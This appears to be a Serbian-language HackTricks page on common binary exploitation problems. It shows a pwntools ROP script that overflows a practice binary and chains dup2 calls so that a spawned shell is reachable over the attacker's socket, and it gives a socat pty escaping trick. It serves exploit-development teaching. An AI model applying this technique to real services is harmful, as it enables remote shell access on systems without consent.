4.1 KiB
Česti problemi eksploatacije
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
- Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite pristupiti najnovijoj verziji PEASS-a ili preuzeti HackTricks u PDF formatu? Proverite PLANOVE ZA PRIJAVU!
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Nabavite zvanični PEASS & HackTricks swag
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite me na Twitteru 🐦@carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova hacktricks repozitorijumu i hacktricks-cloud repozitorijumu.
FD-ovi u udaljenoj eksploataciji
Kada se šalje eksploatacija na udaljeni server koji poziva system('/bin/sh')
na primer, to će biti izvršeno u serverskom procesu, a /bin/sh
će očekivati ulaz sa stdin (FD: 0
) i ispisivati izlaz na stdout i stderr (FD-ovi 1
i 2
). Zato napadač neće moći da interaguje sa shell-om.
Način da se ovo reši je pretpostaviti da je kada je server pokrenut, kreirao FD broj 3
(za osluškivanje) i da će zatim, vaša veza biti na FD broju 4
. Stoga je moguće koristiti sistemski poziv dup2
da duplicira stdin (FD 0) i stdout (FD 1) u FD 4 (onaj koji pripada vezi napadača) kako bi bilo moguće kontaktirati shell nakon što se izvrši.
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
Socat & pty
Imajte na umu da socat već prenosi stdin
i stdout
na socket. Međutim, pty
režim uključuje DELETE karaktere. Dakle, ako pošaljete \x7f
( DELETE
-) obrišće prethodni karakter vašeg eksploata.
Da biste zaobišli ovo, bežični karakter \x16
mora biti dodat na bilo koji \x7f
koji se šalje.
Ovde možete pronaći primer ovog ponašanja.
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
- Da li radite u kompaniji za kibernetičku bezbednost? Želite li da vidite svoju kompaniju reklamiranu na HackTricks? ili želite da imate pristup najnovijoj verziji PEASS-a ili preuzmete HackTricks u PDF-u? Proverite PLANOVE ZA PRIJAVU!
- Otkrijte Porodicu PEASS, našu kolekciju ekskluzivnih NFT-ova
- Nabavite zvanični PEASS & HackTricks swag
- Pridružite se 💬 Discord grupi ili telegram grupi ili me pratite na Twitteru 🐦@carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na hacktricks repozitorijum i hacktricks-cloud repozitorijum.